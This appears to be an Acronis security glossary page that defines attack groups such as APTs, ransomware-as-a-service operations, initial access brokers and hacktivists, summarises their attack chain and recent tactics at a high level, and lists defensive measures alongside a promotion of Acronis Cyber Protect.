Attack Groups: Definition, Types & Protection

Attack groups (also known as threat actors or threat groups) are organized, persistent human adversaries behind coordinated cyber campaigns. These groups include skilled operators, and often have defined objectives, command structures and bespoke toolkits. They range from state‑sponsored espionage units (advanced persistent threats) to profit‑driven criminal enterprises running global cybercriminal franchises (e.g. ransomware‑as‑a‑service).

Key statistic: Multiple threat-intelligence reports identify Qilin as the most active ransomware group in 2025. For example, one study found that Qilin was responsible for roughly 18% of all observed ransomware attacks since April 2025, making it the single most prolific operation over that period (source: Cyble and other industry analyses).

Large‑scale group operations follow a multistage attack chain:

1. Reconnaissance: Operators research targets, scan public‑facing systems for unpatched vulnerabilities and gather employee data for spear‑phishing.
2. Initial compromise: They gain a foothold using spear‑phishing, zero‑day exploits or stolen credentials.
3. Establish foothold: Attackers deploy “living‑off‑the‑land” tools (e.g., PowerShell, WMI) to evade detection and set up command‑and‑control channels.
4. Privilege escalation and lateral movement: They harvest credentials and move laterally to reach domain controllers, file servers and backup repositories.
5. Actions on objectives:

• RaaS groups: Exfiltrate data for double extortion, then encrypt systems with ransomware.
• APTs: Steal sensitive intellectual property, state secrets or sabotage critical infrastructure.

Attack groups differ by motivation, sophistication and affiliation.

APTs are nation‑state or state‑affiliated teams focused on long‑term espionage, intellectual‑property theft and sabotage. They maintain persistence for months or years.

• Lazarus Group (North Korea) – Linked to bank heists and espionage.
• Sandworm (Russia) – Responsible for NotPetya and attacks on Ukrainian infrastructure.
• APT41 (China) – Known for supply‑chain compromises and dual espionage / financial operations.

RaaS groups supply ransomware to affiliates who perform intrusions, creating large, franchised operations. The landscape has shifted dramatically since 2023; several newer groups now dominate activity.

Most active in 2024–2025:

Qilin – One of the fastest-growing and most active RaaS operations in 2025

Qilin’s rapid rise reflects the fragmentation of the ransomware ecosystem after major takedowns. Their campaigns feature data theft, double extortion and broad targeting across healthcare, manufacturing, and government.

Akira – Persistent and technically capable midsized RaaS group

Akira continues to run effective campaigns, often entering through compromised VPN appliances and unpatched remote services. Notable for targeting both Windows and Linux environments.

DragonForce – Emerging “ransomware cartel” model

DragonForce rebranded and expanded its affiliate network in 2024–2025, positioning itself as a consortium rather than a single group. They combine data-theft operations with high-pressure extortion tactics.

Initial access brokers are specialized criminal groups that infiltrate organizations and then sell that access to other threat actors, including ransomware-as-a-service affiliates, data-theft crews and financial-fraud groups.

Their role is foundational in today’s cybercrime economy. Instead of conducting full intrusions themselves, they focus on:

• Harvesting credentials.
• Exploiting vulnerabilities on internet-facing systems.
• Breaching VPNs, firewalls, and remote-access services.
• Selling verified access on dark-web marketplaces.

This division of labor enables RaaS groups to scale quickly because affiliates can purchase ready-made access rather than performing the initial compromise themselves.

Example: Many major ransomware incidents in 2024–2025 began with access acquired from IABs rather than by the ransomware groups themselves.

Hacktivists carry out politically or ideologically motivated attacks such as DDoS, website defacement and data leaks. Their primary goal is publicity rather than financial gain.

A successful breach by a well‑organized group has severe consequences:

• Direct financial loss: Ransom demands, regulatory fines, legal liabilities and the costs of forensic investigation and remediation. These expenses accumulate quickly, especially in large-scale incidents.
• Crippling downtime: Extended outages can exceed the ransom value, as highlighted by ENISA and other agencies (citations).
• Reputational damage: Customers and partners lose trust, leading to churn and difficulty attracting new business.
• Loss of competitive advantage: Intellectual‑property theft erodes long‑term market position.

Callback social engineering and ClickFix-style attacks:  Ransomware and crimeware groups increasingly rely on “callback” schemes where victims are prompted to call a fake support line. Operators then guide them through steps that grant attackers remote access (e.g., through ScreenConnect, AnyDesk or malicious “fix” tools). This method bypasses email security entirely and has become a preferred initial access vector for several RaaS affiliates.

AI-enhanced phishing and deepfake interaction: Attack groups now use AI to generate highly personalized phishing content, business-email-compromise lures and even real-time deepfake audio to impersonate executives or IT staff. This makes traditional red-flag detection (spelling errors, tone inconsistencies) far less reliable.

Cloud identity abuse and lateral movement via SaaS: Instead of targeting endpoints, attackers compromise OAuth tokens, cloud admin accounts or identity providers. This enables silent access to email, file storage and collaboration platforms without touching traditional endpoints.

Ecosystem professionalization: IAB–RaaS pipelines: Initial Access Brokers (IABs) now function as dependable suppliers for major ransomware groups. Affiliates rarely perform their own intrusion work; they simply purchase credentials or footholds and immediately deploy payloads. This specialization accelerates the speed of attacks and explains why groups like Qilin, Akira and DragonForce have risen so quickly.

Abuse of remote management and IT automation tools:  Attackers are increasingly weaponizing legitimate MSP and enterprise IT tools (RMMs, deployment platforms, update servers). These platforms allow mass ransomware deployment with a single command once compromised — a tactic seen repeatedly in 2024–2025 outbreaks.

1. Identity and access management: Enforce phishing‑resistant multifactor authentication (MFA) and least‑privilege access. Identity attacks are now the leading vector (Source:  SANS Institute).
2. Network segmentation: Stop lateral movement by isolating critical systems.
3. Comprehensive backup and DR: A 3‑2‑1 backup strategy with offline / immutable copies is the best defense against ransomware; downtime costs often dwarf ransom amounts.
4. Endpoint detection and response (EDR / MDR): Detect behavioral anomalies (LotL, credential theft) rather than relying solely on signatures.
5. Patch management: Close exploited vulnerabilities by applying patches promptly.
6. Security awareness training: Teach employees to recognize spear‑phishing and social engineering. Human error drives many identity‑related breaches (Source: SANS Institute).

Acronis Cyber Protect delivers an integrated defense tailored to the multi‑stage tactics of RaaS and APT groups:

• AI‑Based Behavioral Detection: Uses machine‑learning models to stop zero‑day exploits, ransomware encryption attempts and credential‑scraping tools.
• Integrated Backup & Instant Recovery: Immutable backups neutralize ransom demands; compromised systems and data can be restored in minutes.
• Endpoint Detection & Response (EDR): Provides attack‑chain visualization and guided response to isolate threats, terminate processes and roll back malicious changes.
• Vulnerability Assessment & Patch Management: Automatically identifies and remediates vulnerable software to block common entry vectors.

See Acronis Cyber Protect in Action

• What is Ransomware? Definition, Types & Protection
• What is Social Engineering? Definition, Tactics & Defense

These terms are often used interchangeably, but have subtle differences:

• Threat Actor (or Attack Group): This is the broadest term. It refers to any individual or group that poses a cybersecurity threat, from a lone hacker to a state-sponsored team.
• Cybercriminal Group: This is a threat group motivated purely by financial gain. Their goals are theft, extortion, and fraud. Ransomware-as-a-Service (RaaS) groups like BlackCat/ALPHV are a primary example.
• Advanced Persistent Threat (APT): This is a specific, high-level type of attack group. APTs are typically state-sponsored, highly skilled, and well-funded. Their goal is not immediate profit but long-term espionage, sabotage, or geopolitical disruption. They are "persistent" because they aim to maintain long-term, stealthy access to a target's network.

Motivations are the primary way to classify attack groups. The main drivers are:

• Financial Gain: The goal is money. This includes RaaS groups extorting ransoms, criminal enterprises stealing bank credentials, and data brokers selling stolen PII on the dark web.
• Espionage: The goal is information. State-sponsored APTs like Lazarus Group steal intellectual property, military plans, and political secrets from rival governments and high-value corporations.
• Ideology: The goal is to make a statement. "Hacktivist" groups deface websites, leak data, or launch DDoS attacks to support a political or social cause.
• Sabotage: The goal is disruption. This is common in military or geopolitical conflicts, where an attack group's objective is to shut down critical infrastructure, like a power grid (e.g., Sandworm) or financial system.

TTP stands for Tactics, Techniques, and Procedures. It's a framework, most famously used by MITRE ATT&CK, to describe and analyze an attack group's behavior.

• Tactics: The attacker's high-level goal (e.g., "Initial Access" or "Lateral Movement").
• Techniques: The specific method used to achieve a tactic (e.g., "Phishing" or "Using Stolen Credentials").
• Procedures: The exact implementation, tool, or exploit used for a technique (e.g., using the LockBit 3.0 payload delivered via a specific email lure).

You can get the latest research, campaign analysis, and TTP breakdowns from cybersecurity vendors and government agencies. The Acronis Cyber Protection Operation Centers (CPOCs) publish regular analysis on new and emerging threats in our TRU (Threat Research and Update) articles. Other key resources include CISA Alerts, the MITRE ATT&CK framework, and annual reports from security firms.